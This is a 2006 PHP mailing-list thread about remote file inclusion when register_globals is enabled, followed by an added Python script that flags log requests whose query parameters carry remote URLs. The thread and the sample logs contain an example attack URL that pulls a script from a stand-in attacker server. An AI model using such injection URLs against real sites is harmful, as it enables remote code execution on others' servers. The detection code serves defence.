At 11:57 AM -0800 11/14/06, bruce wrote:
hi tedd...

for the following url, http://www.example.com/test.php?path=abc?dummy=123

if the register_globals is on, a malicious user could potentially invoke, http://www.example.com/badscript.php?path=http://www.badserver.com/badscript.txt?dummy=123, which would cause the 'badscript.txt' to be used in the original script.

now, this in and of itself wouldn't cause a file on the http server to be changed. however, if the webapp somehow caused the $path var to be invoked or to be used in an exec() function, then whatever is in the 'badscript.txt' file will be run as if the file is on the local system. at this point, you're pretty much at the whim of the malicious user.

now, the chance of this happening is pretty slim, unless you're using some open source app that's unsecure, and that a user can reasonably easily find. which is what has happened to some apps in the past.

a more potential reason for the index.php files to be changed, is that there was some security hole, either via apache, and/or the OS for the server.

hope this helps a little bit more...

Ohhh, so "badscript.php" doesn't have to exist and the badscript.txt is imported via the url, the script is built using only the badscript.txt, and then executed "as-is" -- clever.

Off to try that... :-)

Thanks.

tedd

--
-------
http://sperling.com http://ancientstones.com http://earthstones.com

--
PHP General Mailing List (http://www.php.net/)
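
An added example, not part of the original thread: a check over web server access logs for the request shape bruce describes, a query parameter whose value is itself an absolute URL. The log lines are constructed, and the names `url_valued_params` and `scan` belong to this example only.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Request target from an Apache common/combined log line.
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter value that is itself an absolute URL, e.g. path=http://host/file.txt
REMOTE_URL_RE = re.compile(r"^\s*(?:https?|ftps?)://", re.IGNORECASE)

# Constructed sample log lines (client addresses are documentation ranges).
SAMPLE_LOG = [
    '192.0.2.10 - - [14/Nov/2006:11:50:01 -0800] "GET /test.php?path=abc&dummy=123 HTTP/1.1" 200 512',
    '198.51.100.7 - - [14/Nov/2006:11:52:13 -0800] "GET /test.php?path=http://www.badserver.com/badscript.txt?dummy=123 HTTP/1.1" 200 2048',
    '198.51.100.7 - - [14/Nov/2006:11:52:40 -0800] "GET /test.php?path=http%253A%252F%252Fwww.badserver.com%252Fbadscript.txt HTTP/1.1" 200 2048',
    '192.0.2.10 - - [14/Nov/2006:11:53:02 -0800] "GET /index.php HTTP/1.1" 200 1024',
]


def url_valued_params(target):
    """Return (name, value) pairs whose value decodes to an absolute URL."""
    hits = []
    for name, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        # parse_qsl decodes once; decode again to catch double-encoded values.
        decoded = unquote(value)
        if REMOTE_URL_RE.match(decoded):
            hits.append((name, decoded))
    return hits


def scan(log_lines):
    """Return (line_number, parameter, value) for every suspicious request."""
    findings = []
    for lineno, line in enumerate(log_lines, 1):
        match = REQUEST_RE.search(line)
        if match is None:
            continue  # not a request line this check understands
        for name, value in url_valued_params(match.group(1)):
            findings.append((lineno, name, value))
    return findings


if __name__ == "__main__":
    for lineno, name, value in scan(SAMPLE_LOG):
        print(f"line {lineno}: parameter {name!r} carries remote URL {value}")
```

Applications that legitimately pass URLs in parameters (redirect targets, callbacks) will also match, so treat hits as leads to review against the script that handled the request.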